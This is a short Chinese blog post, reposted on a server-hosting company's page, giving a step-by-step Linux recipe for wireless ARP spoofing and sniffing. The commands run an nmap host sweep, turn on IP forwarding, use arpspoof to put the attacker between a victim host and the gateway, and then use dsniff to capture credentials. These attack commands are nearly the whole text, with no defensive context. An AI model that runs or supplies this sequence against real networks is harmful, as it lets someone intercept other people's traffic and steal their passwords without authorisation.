快速业务通道

linux下的无线ARP欺骗和嗅探

作者 佚名技术 来源 Linux系统 浏览 发布时间 2012-03-23

ifconfig wlan0 up //激活网卡
nmap -sP 192.168.1.0/24 //扫描自己网段下的存活主机,根据情况确定范围
ifconfig //查看网关信息
echo "1">/proc/sys/net/ipv4/ip_forward //开启数据包转发
接下来需要arpspoof这个工具,

Empire CMS,phome.net

arpspoof -i wlan0 -t 192.168.1.101 192.168.1.1 //转发主机192.168.1.101网关之间的通讯数据
然后用dsniff查看数据,
dsniff -i wlan0

本文出自 “Samae1's Blog” 博客,请务必保留此出处http://samae1.blog.51cto.com/3248581/729673

Empire CMS,phome.net

凌众科技专业提供服务器租用、服务器托管、企业邮局、虚拟主机等服务,公司网站:http://www.lingzhong.cn 为了给广大客户了解更多的技术信息,本技术文章收集来源于网络,凌众科技尊重文章作者的版权,如果有涉及你的版权有必要删除你的文章,请和我们联系。以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息,谢谢!

分享到: 更多

Copyright ©1999-2011 厦门凌众科技有限公司 厦门优通互联科技开发有限公司 All rights reserved

地址(ADD):厦门软件园二期望海路63号701E(东南融通旁) 邮编(ZIP):361008

电话:0592-5908028 传真:0592-5908039 咨询信箱:web@lingzhong.cn 咨询OICQ:173723134

《中华人民共和国增值电信业务经营许可证》闽B2-20100024  ICP备案:闽ICP备05037997号